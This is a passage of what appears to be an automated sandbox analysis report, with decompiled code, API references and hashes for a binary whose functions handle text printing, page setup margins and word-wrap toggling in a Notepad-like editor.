                                                  0x010a1d38
                                                  0x010a1d3f
                                                  0x010a1d46
                                                  0x010a1d4d
                                                  0x010a1d54
                                                  0x010a1d5b
                                                  0x010a1dca
                                                  0x010a1dd8
                                                  0x010a1dd8
                                                  0x010a1dee
                                                  0x010a1df0
                                                  0x010a1df5
                                                  0x010a1e14
                                                  0x010a1e1e
                                                  0x010a1e24
                                                  0x010a1e26
                                                  0x010a1fd2
                                                  0x010a1fd5
                                                  0x00000000
                                                  0x010a1fec
                                                  0x010a1e4c
                                                  0x010a1e63
                                                  0x010a1e72
                                                  0x010a1e89
                                                  0x010a1e95
                                                  0x010a1eac
                                                  0x010a1ebb
                                                  0x010a1ee0
                                                  0x010a1ee3
                                                  0x010a1ef2
                                                  0x010a1ef4
                                                  0x010a1efb
                                                  0x010a1f08
                                                  0x010a1f12
                                                  0x010a1f15
                                                  0x010a1f1b
                                                  0x010a1f1e
                                                  0x010a1f23
                                                  0x010a1f28
                                                  0x010a1f2c
                                                  0x010a1fb3
                                                  0x010a1fb6
                                                  0x010a1fc2
                                                  0x010a1fcb
                                                  0x00000000
                                                  0x010a1fd1
                                                  0x010a1f35
                                                  0x010a1f35
                                                  0x010a1f37
                                                  0x010a1f3a
                                                  0x010a1f40
                                                  0x010a1f40
                                                  0x010a1f49
                                                  0x010a1f4e
                                                  0x010a1f51
                                                  0x010a1f54
                                                  0x010a1f60
                                                  0x010a1f60
                                                  0x010a1f64
                                                  0x010a1f7b
                                                  0x010a1f80
                                                  0x010a1f94
                                                  0x010a1f96
                                                  0x010a1f97
                                                  0x010a1f99
                                                  0x00000000
                                                  0x00000000
                                                  0x00000000
                                                  0x010a1f99
                                                  0x010a1f6a
                                                  0x010a1f6c
                                                  0x00000000
                                                  0x00000000
                                                  0x010a1f74
                                                  0x010a1f76
                                                  0x00000000
                                                  0x010a1f9b
                                                  0x010a1f9e
                                                  0x010a1f9e
                                                  0x010a1fa3
                                                  0x010a1fa5
                                                  0x00000000
                                                  0x00000000
                                                  0x010a1fab
                                                  0x010a1fac
                                                  0x010a1fae
                                                  0x010a1fae
                                                  0x00000000
                                                  0x010a1f40
                                                  0x010a1e05
                                                  0x010a1d5d
                                                  0x010a1d68
                                                  0x010a1d70
                                                  0x010a1d73
                                                  0x010a1d80
                                                  0x010a1d8a
                                                  0x010a1d94
                                                  0x010a1d9e
                                                  0x010a1da8
                                                  0x010a1db2
                                                  0x010a1dba
                                                  0x010a1dbc
                                                  0x010a1dc1
                                                  0x010a1dc4
                                                  0x00000000
                                                  0x00000000
                                                  0x00000000
                                                  0x00000000
                                                  0x010a1dc4
                                                  0x010a1d5b

                                                  APIs
                                                  • _memset.LIBCMT ref: 010A1CC1
                                                  • PrintDlgW.COMDLG32(?), ref: 010A1D0B
                                                  • SetMapMode.GDI32(?,00000001), ref: 010A1D2E
                                                  • _memset.LIBCMT ref: 010A1D68
                                                  • GetSaveFileNameW.COMDLG32(?), ref: 010A1DB2
                                                  • GetWindowTextLengthW.USER32 ref: 010A1DD2
                                                  • GetProcessHeap.KERNEL32(00000000,00000000), ref: 010A1DE1
                                                  • HeapAlloc.KERNEL32(00000000), ref: 010A1DE8
                                                  • DeleteDC.GDI32(?), ref: 010A1DFA
                                                  • GetWindowTextW.USER32 ref: 010A1E0E
                                                  • StartDocW.GDI32(?,00000014), ref: 010A1E1E
                                                  • GetDeviceCaps.GDI32(?,0000005A), ref: 010A1E3D
                                                  • MulDiv.KERNEL32(00000000), ref: 010A1E4C
                                                  • GetDeviceCaps.GDI32(?,00000071), ref: 010A1E55
                                                  • GetDeviceCaps.GDI32(?,0000005A), ref: 010A1E69
                                                  • MulDiv.KERNEL32(00000000), ref: 010A1E72
                                                  • GetDeviceCaps.GDI32(?,0000006F), ref: 010A1E7B
                                                  • GetDeviceCaps.GDI32(?,00000058), ref: 010A1E8C
                                                  • MulDiv.KERNEL32(00000000), ref: 010A1E95
                                                  • GetDeviceCaps.GDI32(?,00000070), ref: 010A1E9E
                                                  • GetDeviceCaps.GDI32(?,00000058), ref: 010A1EB2
                                                  • MulDiv.KERNEL32(00000000), ref: 010A1EBB
                                                  • GetDeviceCaps.GDI32(?,0000006E), ref: 010A1EC4
                                                  • GetDeviceCaps.GDI32(?,0000005A), ref: 010A1EE5
                                                  • MulDiv.KERNEL32(?,00000000), ref: 010A1EF2
                                                  • CreateFontIndirectW.GDI32(?), ref: 010A1F08
                                                  • SelectObject.GDI32(?,00000000), ref: 010A1F15
                                                  • EndDoc.GDI32(?), ref: 010A1FB6
                                                  • SelectObject.GDI32(?,?), ref: 010A1FC2
                                                  • DeleteObject.GDI32(?), ref: 010A1FCB
                                                  • DeleteDC.GDI32(?), ref: 010A1FD5
                                                  • GetProcessHeap.KERNEL32(00000000,00000000), ref: 010A1FDE
                                                  • HeapFree.KERNEL32(00000000), ref: 010A1FE5
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000001.00000002.257888130.00000000010A1000.00000020.00000001.01000000.00000004.sdmp, Offset: 010A0000, based on PE: true
                                                  • Associated: 00000001.00000002.257880758.00000000010A0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000001.00000002.257907719.00000000010BC000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000001.00000002.257934514.00000000010C1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000001.00000002.257978063.00000000010C6000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_1_2_10a0000_oaqcoreqiw.jbxd
                                                  Similarity
                                                  • API ID: CapsDevice$Heap$DeleteObject$ProcessSelectTextWindow_memset$AllocCreateFileFontFreeIndirectLengthModeNamePrintSaveStart
                                                  • String ID: $B$X$d$output.prn$prn
                                                  • API String ID: 1012857974-290299934
                                                  • Opcode ID: 76a1c6afb9bd5251449a4714e256d19bcde66cf97625c41d9c3722fe9463210a
                                                  • Instruction ID: 421f3cfadb9668999931931a061ff8df3cb428f61af2f64e0476b321be325b46
                                                  • Opcode Fuzzy Hash: 76a1c6afb9bd5251449a4714e256d19bcde66cf97625c41d9c3722fe9463210a
                                                  • Instruction Fuzzy Hash: E0A10571D00258EFEB209FE4DD88BDEBBB9FB48304F004065EA85AB294DB7A5945CF50
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 010A1980 Relevance: 33.5, APIs: 17, Strings: 2, Instructions: 294memorystringwindowCOMMON
                                                  Download Yara Rule
                                                  C-Code - Quality: 92%
                                                  			E010A1980(struct HDC__* __ecx, int* __edx, void* __eflags, intOrPtr _a4, WCHAR* _a8, int _a12) {
				struct HDC__* _v8;
				struct tagSIZE _v16;
				int* _v20;
				struct tagSIZE _v28;
				struct tagTEXTMETRICW _v88;
				signed int _t93;
				int _t96;
				int _t104;
				int _t106;
				WCHAR* _t120;
				int _t121;
				signed int _t128;
				int _t131;
				int _t142;
				struct HDC__* _t153;
				signed int _t154;
				int _t156;
				struct HDC__* _t157;
				short _t162;
				signed int _t163;
				WCHAR* _t164;
				WCHAR* _t168;
				int _t169;
				int _t170;
				void* _t171;
				RECT* _t172;
				intOrPtr _t174;
				int _t175;
				void* _t178;
				int* _t179;
				void* _t180;
				void* _t184;

				_t172 = __edx;
				_t168 = _a8;
				_t153 = __ecx;
				_v20 = __edx;
				_v8 = __ecx;
				_t178 = E010A1890(0x10c4ea8, _t168);
				_a8 = _t178;
				if(_t178 == 0) {
					L4:
					return 0;
				} else {
					if(_a4 == 0 || StartPage(__ecx) > 0) {
						GetTextMetricsW(_t153,  &_v88);
						_t92 = lstrlenW;
						if( *0x10c43b0 == 0) {
							_t154 = 0;
						} else {
							GetTextExtentPoint32W(_t153, 0x10c43b0, lstrlenW(0x10c43b0),  &_v16);
							if(_a4 != 0) {
								_t142 = lstrlenW(0x10c43b0);
								asm("cdq");
								ExtTextOutW(_t153, _t172->right - _v16.cx + _t172->left - _t168 >> 1, _t172->top, 4, _t172, 0x10c43b0, _t142, 0);
								_t178 = _a8;
							}
							_t92 = lstrlenW;
							_t154 = 1;
						}
						_t156 = _t154 * _v88.tmHeight + _t172->top;
						if( *_t178 == 0) {
							_t93 = 0;
						} else {
							GetTextExtentPoint32W(_v8, _t178,  *_t92( &_v16), _t178);
							_t93 = 1;
						}
						_t179 = _a12;
						_t174 = _t172->bottom - _t93 * _v88.tmHeight + _t93 * _v88.tmHeight;
						_v16.cy = _t174;
						do {
							_t169 = _t179[3];
							if(_t169 != 0 ||  *_t179 >= _t179[1]) {
								L30:
								if( *0x10c3f9c == 0) {
									_t170 = _t179[3];
									goto L40;
								} else {
									goto L31;
								}
							} else {
								while(1) {
									L16:
									_t162 =  *( *_t179) & 0x0000ffff;
									if(_t162 == 0xa || _t162 == 0xd) {
										goto L30;
									}
									if(_t162 != 9) {
										if(_t169 >= 0x1f4) {
											goto L28;
										} else {
											_t179[3] = _t179[3] + 1;
											_t179[2][_t169] = _t162;
											goto L27;
										}
									} else {
										_t171 = 0;
										do {
											_t163 = _t179[3];
											if(_t163 >= 0x1f4) {
												if( *0x10c3f9c == 0) {
													goto L23;
												}
											} else {
												_t179[2][_t163] = 0x20;
												_t174 = _v16.cy;
												_t179[3] = _t163 + 1;
												goto L23;
											}
											L27:
											_t169 = _t179[3];
											if(_t169 < 0x1f4) {
												L29:
												 *_t179 =  *_t179 + 2;
												if( *_t179 < _t179[1]) {
													goto L16;
												} else {
													goto L30;
												}
											} else {
												L28:
												if( *0x10c3f9c != 0) {
													L31:
													GetTextExtentExPointW(_v8, _t179[2], _t179[3], _v20[2] -  *_v20,  &_a12, 0,  &_v28);
													_t170 = _a12;
													if(_t170 < _t179[3]) {
														_t120 = _t179[2];
														_t164 =  &(_t120[_t170]);
														if(_t120[_t170] != 0x20) {
															_t121 = _t170;
															if(_t170 != 0) {
																while( *_t164 != 0x20) {
																	_t164 = _t164 - 2;
																	_t121 = _t121 - 1;
																	if(_t121 != 0) {
																		continue;
																	}
																	goto L37;
																}
															}
															L37:
															if(_t121 > 0) {
																_t170 = _t121 + 1;
																L40:
																_a12 = _t170;
															}
														}
													}
												} else {
													goto L29;
												}
											}
											goto L41;
											L23:
											_t171 = _t171 + 1;
										} while (_t171 < 8);
										goto L27;
									}
									goto L41;
								}
								goto L30;
							}
							L41:
							if(_a4 != 0) {
								ExtTextOutW(_v8,  *_v20, _t156, 4, _v20, _t179[2], _t170, 0);
								_t170 = _a12;
							}
							_t59 =  &(_t179[3]);
							 *_t59 = _t179[3] - _t170;
							_t96 = _t179[3];
							if( *_t59 == 0) {
								_t175 = _t179[1];
								if( *_t179 < _t175) {
									while(_t156 < _v16.cy) {
										_t170 =  *_t179;
										_t128 =  *_t170 & 0x0000ffff;
										if(_t128 == 0xa) {
											L50:
											_t156 = _t156 + _v88.tmExternalLeading + _v88.tmHeight;
											goto L51;
										} else {
											if(_t128 == 0xd) {
												if(_t128 == 0xa) {
													goto L50;
												}
												L51:
												_t131 = _t170 + 2;
												 *_t179 = _t131;
												if(_t131 < _t175) {
													continue;
												}
											}
										}
										goto L52;
									}
								}
								L52:
								_t174 = _v16.cy;
							} else {
								E010A81F0(_t179[2],  &(_t179[2][_t170]), _t96 + _t96);
								_t184 = _t184 + 0xc;
								_t156 = _t156 + _v88.tmExternalLeading + _v88.tmHeight;
							}
						} while ( *_t179 < _t179[1] && _t156 < _t174);
						_t180 = _a8;
						if( *_t180 == 0) {
							_t157 = _v8;
							goto L59;
						} else {
							_t104 = lstrlenW(_t180);
							_t157 = _v8;
							GetTextExtentPoint32W(_t157, _t180, _t104,  &_v16);
							if(_a4 != 0) {
								_t176 = _v20;
								_t106 = lstrlenW(_a8);
								asm("cdq");
								ExtTextOutW(_t157, _v20[2] - _v16.cx +  *_v20 - _t170 >> 1, _v20->bottom - _v16.cy, 4, _t176, _a8, _t106, 0);
								_t180 = _a8;
								L59:
								if(_a4 != 0) {
									EndPage(_t157);
								}
							}
						}
						HeapFree(GetProcessHeap(), 0, _t180);
						return 1;
					} else {
						MessageBoxW( *0x10c3f24, L"StartPage failed", L"Print Error", 0x30);
						HeapFree(GetProcessHeap(), 0, _t178);
						goto L4;
					}
				}
			}



































                                                  0x010a1989
                                                  0x010a198b
                                                  0x010a198e
                                                  0x010a1995
                                                  0x010a1998
                                                  0x010a19a0
                                                  0x010a19a2
                                                  0x010a19a7
                                                  0x010a19e4
                                                  0x010a19ea
                                                  0x010a19a9
                                                  0x010a19ad
                                                  0x010a19f2
                                                  0x010a1a00
                                                  0x010a1a05
                                                  0x010a1a64
                                                  0x010a1a07
                                                  0x010a1a19
                                                  0x010a1a23
                                                  0x010a1a34
                                                  0x010a1a45
                                                  0x010a1a4f
                                                  0x010a1a55
                                                  0x010a1a55
                                                  0x010a1a58
                                                  0x010a1a5d
                                                  0x010a1a5d
                                                  0x010a1a6a
                                                  0x010a1a71
                                                  0x010a1a8c
                                                  0x010a1a73
                                                  0x010a1a7f
                                                  0x010a1a85
                                                  0x010a1a85
                                                  0x010a1a95
                                                  0x010a1a9a
                                                  0x010a1a9c
                                                  0x010a1aa0
                                                  0x010a1aa0
                                                  0x010a1aa5
                                                  0x010a1b33
                                                  0x010a1b3a
                                                  0x010a1b95
                                                  0x00000000
                                                  0x00000000
                                                  0x00000000
                                                  0x00000000
                                                  0x010a1ab6
                                                  0x010a1ab6
                                                  0x010a1ab6
                                                  0x010a1ab8
                                                  0x010a1abe
                                                  0x00000000
                                                  0x00000000
                                                  0x010a1ac8
                                                  0x010a1b09
                                                  0x00000000
                                                  0x010a1b0b
                                                  0x010a1b0e
                                                  0x010a1b11
                                                  0x00000000
                                                  0x010a1b11
                                                  0x010a1aca
                                                  0x010a1aca
                                                  0x010a1ad0
                                                  0x010a1ad0
                                                  0x010a1ad9
                                                  0x010a1af9
                                                  0x00000000
                                                  0x00000000
                                                  0x010a1adb
                                                  0x010a1ae3
                                                  0x010a1ae7
                                                  0x010a1aed
                                                  0x00000000
                                                  0x010a1aed
                                                  0x010a1b15
                                                  0x010a1b15
                                                  0x010a1b1e
                                                  0x010a1b29
                                                  0x010a1b29
                                                  0x010a1b31
                                                  0x00000000
                                                  0x00000000
                                                  0x00000000
                                                  0x00000000
                                                  0x010a1b20
                                                  0x010a1b20
                                                  0x010a1b27
                                                  0x010a1b3c
                                                  0x010a1b58
                                                  0x010a1b5e
                                                  0x010a1b64
                                                  0x010a1b66
                                                  0x010a1b6e
                                                  0x010a1b71
                                                  0x010a1b73
                                                  0x010a1b77
                                                  0x010a1b80
                                                  0x010a1b86
                                                  0x010a1b89
                                                  0x010a1b8a
                                                  0x00000000
                                                  0x00000000
                                                  0x00000000
                                                  0x010a1b8a
                                                  0x010a1b80
                                                  0x010a1b8c
                                                  0x010a1b8e
                                                  0x010a1b90
                                                  0x010a1b98
                                                  0x010a1b98
                                                  0x010a1b98
                                                  0x010a1b8e
                                                  0x010a1b71
                                                  0x00000000
                                                  0x00000000
                                                  0x00000000
                                                  0x010a1b27
                                                  0x00000000
                                                  0x010a1afb
                                                  0x010a1afb
                                                  0x010a1afc
                                                  0x00000000
                                                  0x010a1b01
                                                  0x00000000
                                                  0x010a1ac8
                                                  0x00000000
                                                  0x010a1ab6
                                                  0x010a1b9b
                                                  0x010a1b9f
                                                  0x010a1bb3
                                                  0x010a1bb9
                                                  0x010a1bb9
                                                  0x010a1bbc
                                                  0x010a1bbc
                                                  0x010a1bbf
                                                  0x010a1bc2
                                                  0x010a1be1
                                                  0x010a1be6
                                                  0x010a1be8
                                                  0x010a1bed
                                                  0x010a1bef
                                                  0x010a1bf5
                                                  0x010a1c01
                                                  0x010a1c07
                                                  0x00000000
                                                  0x010a1bf7
                                                  0x010a1bfa
                                                  0x010a1bff
                                                  0x00000000
                                                  0x00000000
                                                  0x010a1c09
                                                  0x010a1c09
                                                  0x010a1c0c
                                                  0x010a1c10
                                                  0x00000000
                                                  0x00000000
                                                  0x010a1c10
                                                  0x010a1bfa
                                                  0x00000000
                                                  0x010a1bf5
                                                  0x010a1be8
                                                  0x010a1c12
                                                  0x010a1c12
                                                  0x010a1bc4
                                                  0x010a1bcf
                                                  0x010a1bda
                                                  0x010a1bdd
                                                  0x010a1bdd
                                                  0x010a1c17
                                                  0x010a1c24
                                                  0x010a1c2b
                                                  0x010a1c81
                                                  0x00000000
                                                  0x010a1c2d
                                                  0x010a1c37
                                                  0x010a1c39
                                                  0x010a1c3f
                                                  0x010a1c49
                                                  0x010a1c4b
                                                  0x010a1c59
                                                  0x010a1c6c
                                                  0x010a1c76
                                                  0x010a1c7c
                                                  0x010a1c84
                                                  0x010a1c88
                                                  0x010a1c8b
                                                  0x010a1c8b
                                                  0x010a1c88
                                                  0x010a1c49
                                                  0x010a1c9b
                                                  0x010a1cac
                                                  0x010a19ba
                                                  0x010a19cc
                                                  0x010a19dc
                                                  0x00000000
                                                  0x010a19dc
                                                  0x010a19ad

                                                  APIs
                                                    • Part of subcall function 010A1890: GetProcessHeap.KERNEL32(00000000,00000000), ref: 010A18F0
                                                    • Part of subcall function 010A1890: HeapAlloc.KERNEL32(00000000), ref: 010A18F7
                                                  • StartPage.GDI32 ref: 010A19B0
                                                  • MessageBoxW.USER32(StartPage failed,Print Error,00000030), ref: 010A19CC
                                                  • GetProcessHeap.KERNEL32(00000000,00000000), ref: 010A19D5
                                                  • HeapFree.KERNEL32(00000000), ref: 010A19DC
                                                  • GetTextMetricsW.GDI32(?,?), ref: 010A19F2
                                                  • GetTextExtentPoint32W.GDI32(?,010C43B0,00000000), ref: 010A1A19
                                                  • ExtTextOutW.GDI32(?,?,?,00000004,?,010C43B0,00000000), ref: 010A1A4F
                                                  • GetTextExtentPoint32W.GDI32(?,00000000,00000000), ref: 010A1A7F
                                                  • GetTextExtentExPointW.GDI32(?,00000000,?,00000000,?,00000000,?), ref: 010A1B58
                                                  • ExtTextOutW.GDI32(?,?,?,00000004,?,00000000,?,00000000), ref: 010A1BB3
                                                  • _memmove.LIBCMT ref: 010A1BCF
                                                  • GetTextExtentPoint32W.GDI32(?,?,00000000), ref: 010A1C3F
                                                  • lstrlenW.KERNEL32(?,00000000,?,?), ref: 010A1C59
                                                  • ExtTextOutW.GDI32(?,?,00000000,00000004,?,?,00000000), ref: 010A1C76
                                                  • EndPage.GDI32(?), ref: 010A1C8B
                                                  • GetProcessHeap.KERNEL32(00000000,?,?,?), ref: 010A1C94
                                                  • HeapFree.KERNEL32(00000000,?,?), ref: 010A1C9B
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000001.00000002.257888130.00000000010A1000.00000020.00000001.01000000.00000004.sdmp, Offset: 010A0000, based on PE: true
                                                  • Associated: 00000001.00000002.257880758.00000000010A0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000001.00000002.257907719.00000000010BC000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000001.00000002.257934514.00000000010C1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000001.00000002.257978063.00000000010C6000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_1_2_10a0000_oaqcoreqiw.jbxd
                                                  Similarity
                                                  • API ID: Text$Heap$Extent$Point32Process$FreePage$AllocMessageMetricsPointStart_memmovelstrlen
                                                  • String ID: Print Error$StartPage failed
                                                  • API String ID: 1514916518-1681616764
                                                  • Opcode ID: c715c7e5aff2b88ee9ab638bd266860adb3502512a7afbf7e788e3d3105650e2
                                                  • Instruction ID: 1fd3a96bbde844559cde83e076cc4f915cf648cc8b05bce6663b29778c271b45
                                                  • Opcode Fuzzy Hash: c715c7e5aff2b88ee9ab638bd266860adb3502512a7afbf7e788e3d3105650e2
                                                  • Instruction Fuzzy Hash: 17B17A31610205EFEB20CF98C984FAAB7F9FF45310F548959FAD69B250E735A980CB90
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 010A21F0 Relevance: 31.6, APIs: 17, Strings: 1, Instructions: 97windowmemoryCOMMON
                                                  Download Yara Rule
                                                  C-Code - Quality: 87%
                                                  			E010A21F0() {
				struct tagRECT _v20;
				void* _t10;
				int _t12;
				struct HWND__* _t18;
				signed int _t26;
				long _t30;
				void* _t31;
				void* _t34;
				int _t37;

				_t1 = GetWindowTextLengthW( *0x10c3f2c) + 1; // 0x1
				_t37 = _t1;
				_t10 = HeapAlloc(GetProcessHeap(), 0, _t37 + _t37);
				_t31 = _t10;
				if(_t31 != 0) {
					GetWindowTextW( *0x10c3f2c, _t31, _t37);
					_t12 = SendMessageW( *0x10c3f2c, 0xb8, 0, 0);
					DestroyWindow( *0x10c3f2c);
					GetClientRect( *0x10c3f24,  &_v20);
					_t17 =  !=  ? 0x50b000c4 : 0x50a00044;
					_t18 = CreateWindowExW(0x200, L"edit", 0,  !=  ? 0x50b000c4 : 0x50a00044, 0, 0, _v20.right, _v20.bottom,  *0x10c3f24, 0,  *0x10c3f20, 0);
					 *0x10c3f2c = _t18;
					SendMessageW(_t18, 0x30,  *0x10c3f30, 0);
					SetWindowTextW( *0x10c3f2c, _t31);
					SendMessageW( *0x10c3f2c, 0xb9, _t12, 0);
					SetFocus( *0x10c3f2c);
					HeapFree(GetProcessHeap(), 0, _t31);
					_t26 = 0 |  *0x10c3f9c == 0x00000000;
					 *0x10c3f9c = _t26;
					asm("sbb eax, eax");
					_t30 = CheckMenuItem(GetMenu( *0x10c3f24), 0x119,  ~_t26 & 0x00000008);
					__imp__#410( *0x10c3f2c, 0x10a2880, 0, 0, _t34);
					return _t30;
				}
				return _t10;
			}












                                                  0x010a2204
                                                  0x010a2204
                                                  0x010a2214
                                                  0x010a221a
                                                  0x010a221e
                                                  0x010a222d
                                                  0x010a2248
                                                  0x010a2252
                                                  0x010a2262
                                                  0x010a228c
                                                  0x010a22a3
                                                  0x010a22b1
                                                  0x010a22b9
                                                  0x010a22c2
                                                  0x010a22d6
                                                  0x010a22de
                                                  0x010a22ee
                                                  0x010a22fc
                                                  0x010a22ff
                                                  0x010a2306
                                                  0x010a231e
                                                  0x010a2333
                                                  0x00000000
                                                  0x010a2339
                                                  0x010a233f

                                                  APIs
                                                  • GetWindowTextLengthW.USER32 ref: 010A21FE
                                                  • GetProcessHeap.KERNEL32(00000000), ref: 010A220D
                                                  • HeapAlloc.KERNEL32(00000000), ref: 010A2214
                                                  • GetWindowTextW.USER32 ref: 010A222D
                                                  • SendMessageW.USER32(000000B8,00000000,00000000), ref: 010A2248
                                                  • DestroyWindow.USER32 ref: 010A2252
                                                  • GetClientRect.USER32 ref: 010A2262
                                                  • CreateWindowExW.USER32 ref: 010A22A3
                                                  • SendMessageW.USER32(00000000,00000030,00000000), ref: 010A22B9
                                                  • SetWindowTextW.USER32(00000000), ref: 010A22C2
                                                  • SendMessageW.USER32(000000B9,00000000,00000000), ref: 010A22D6
                                                  • SetFocus.USER32 ref: 010A22DE
                                                  • GetProcessHeap.KERNEL32(00000000,00000000), ref: 010A22E7
                                                  • HeapFree.KERNEL32(00000000), ref: 010A22EE
                                                  • GetMenu.USER32(00000119), ref: 010A2317
                                                  • CheckMenuItem.USER32(00000000), ref: 010A231E
                                                  • #410.COMCTL32(010A2880,00000000,00000000), ref: 010A2333
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000001.00000002.257888130.00000000010A1000.00000020.00000001.01000000.00000004.sdmp, Offset: 010A0000, based on PE: true
                                                  • Associated: 00000001.00000002.257880758.00000000010A0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000001.00000002.257907719.00000000010BC000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000001.00000002.257934514.00000000010C1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000001.00000002.257978063.00000000010C6000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_1_2_10a0000_oaqcoreqiw.jbxd
                                                  Similarity
                                                  • API ID: Window$Heap$MessageSendText$MenuProcess$#410AllocCheckClientCreateDestroyFocusFreeItemLengthRect
                                                  • String ID: edit
                                                  • API String ID: 2317382731-2167791130
                                                  • Opcode ID: 4fb1c42572464a47442d786c0c4fa3d639d2f88abba13bbf4ceed1f38e5a6e98
                                                  • Instruction ID: 10edfe82064319b03e1315704a2249590825abf2de24a43de09c37d32d48b037
                                                  • Opcode Fuzzy Hash: 4fb1c42572464a47442d786c0c4fa3d639d2f88abba13bbf4ceed1f38e5a6e98
                                                  • Instruction Fuzzy Hash: F931ED72250206FFEB312BA1ED9AF963A79FB08701F108424F6C5A9198D77B58159F14
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 010A2600 Relevance: 29.9, APIs: 15, Strings: 2, Instructions: 143windowCOMMON
                                                  Download Yara Rule
                                                  C-Code - Quality: 100%
                                                  			E010A2600(struct HWND__* _a4, intOrPtr _a8, intOrPtr _a12) {
				void* _t21;
				void* _t48;
				void* _t61;
				struct HWND__* _t78;
				struct HWND__* _t79;

				_t21 = _a8 - 0x110;
				if(_t21 == 0) {
					_t78 = _a4;
					SetDlgItemTextW(_t78, 0x141, 0x10c4ca0);
					SetDlgItemTextW(_t78, 0x143, 0x10c4ea8);
					SetDlgItemInt(_t78, 0x14d, (0x51eb851f *  *0x10c4c90 >> 0x20 >> 5 >> 0x1f) + (0x51eb851f *  *0x10c4c90 >> 0x20 >> 5), 0);
					SetDlgItemInt(_t78, 0x150, (0x51eb851f *  *0x10c4c94 >> 0x20 >> 5 >> 0x1f) + (0x51eb851f *  *0x10c4c94 >> 0x20 >> 5), 0);
					SetDlgItemInt(_t78, 0x147, (0x51eb851f *  *0x10c4c98 >> 0x20 >> 5 >> 0x1f) + (0x51eb851f *  *0x10c4c98 >> 0x20 >> 5), 0);
					SetDlgItemInt(_t78, 0x14a, (0x51eb851f *  *0x10c4c9c >> 0x20 >> 5 >> 0x1f) + (0x51eb851f *  *0x10c4c9c >> 0x20 >> 5), 0);
					goto L9;
				} else {
					if(_t21 != 1) {
						L9:
						return 0;
					} else {
						_t48 = _a12 - 1;
						if(_t48 == 0) {
							_t79 = _a4;
							GetDlgItemTextW(_t79, 0x141, 0x10c4ca0, 0);
							GetDlgItemTextW(_t79, 0x143, 0x10c4ea8, 0);
							 *0x10c4c90 = GetDlgItemInt(_t79, 0x14d, 0, 0) * 0x64;
							 *0x10c4c94 = GetDlgItemInt(_t79, 0x150, 0, 0) * 0x64;
							 *0x10c4c98 = GetDlgItemInt(_t79, 0x147, 0, 0) * 0x64;
							 *0x10c4c9c = GetDlgItemInt(_t79, 0x14a, 0, 0) * 0x64;
							EndDialog(_t79, 1);
							return 1;
						} else {
							_t61 = _t48 - 1;
							if(_t61 == 0) {
								EndDialog(_a4, 2);
								return 1;
							} else {
								if(_t61 != 7) {
									goto L9;
								} else {
									MessageBoxW( *0x10c3f24, L"Sorry, no help available", L"Help", 0x30);
									return 1;
								}
							}
						}
					}
				}
			}








                                                  0x010a2608
                                                  0x010a260d
                                                  0x010a26f6
                                                  0x010a270a
                                                  0x010a2717
                                                  0x010a273d
                                                  0x010a275d
                                                  0x010a277d
                                                  0x010a279d
                                                  0x00000000
                                                  0x010a2613
                                                  0x010a2614
                                                  0x010a27a0
                                                  0x010a27a4
                                                  0x010a261a
                                                  0x010a261d
                                                  0x010a261e
                                                  0x010a2665
                                                  0x010a267b
                                                  0x010a268a
                                                  0x010a26ab
                                                  0x010a26bf
                                                  0x010a26d3
                                                  0x010a26e0
                                                  0x010a26e5
                                                  0x010a26f3
                                                  0x010a2620
                                                  0x010a2620
                                                  0x010a2621
                                                  0x010a2654
                                                  0x010a2662
                                                  0x010a2623
                                                  0x010a2626
                                                  0x00000000
                                                  0x010a262c
                                                  0x010a263e
                                                  0x010a264c
                                                  0x010a264c
                                                  0x010a2626
                                                  0x010a2621
                                                  0x010a261e
                                                  0x010a2614

                                                  APIs
                                                  • MessageBoxW.USER32(Sorry, no help available,Help,00000030), ref: 010A263E
                                                  • EndDialog.USER32(?,00000002), ref: 010A2654
                                                  • GetDlgItemTextW.USER32(?,00000141,010C4CA0,00000000), ref: 010A267B
                                                  • GetDlgItemTextW.USER32(?,00000143,010C4EA8,00000000), ref: 010A268A
                                                  • GetDlgItemInt.USER32(?,0000014D,00000000,00000000), ref: 010A269C
                                                  • GetDlgItemInt.USER32(?,00000150,00000000,00000000), ref: 010A26B0
                                                  • GetDlgItemInt.USER32(?,00000147,00000000,00000000), ref: 010A26C4
                                                  • GetDlgItemInt.USER32(?,0000014A,00000000,00000000), ref: 010A26D8
                                                  • EndDialog.USER32(?,00000001), ref: 010A26E5
                                                  • SetDlgItemTextW.USER32 ref: 010A270A
                                                  • SetDlgItemTextW.USER32 ref: 010A2717
                                                  • SetDlgItemInt.USER32(?,0000014D,?,00000000), ref: 010A273D
                                                  • SetDlgItemInt.USER32(?,00000150,?,00000000), ref: 010A275D
                                                  • SetDlgItemInt.USER32(?,00000147,?,00000000), ref: 010A277D
                                                  • SetDlgItemInt.USER32(?,0000014A,?,00000000), ref: 010A279D
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000001.00000002.257888130.00000000010A1000.00000020.00000001.01000000.00000004.sdmp, Offset: 010A0000, based on PE: true
                                                  • Associated: 00000001.00000002.257880758.00000000010A0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000001.00000002.257907719.00000000010BC000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000001.00000002.257934514.00000000010C1000.00000004.00000001.01000000.00000004.sdmpDownload File
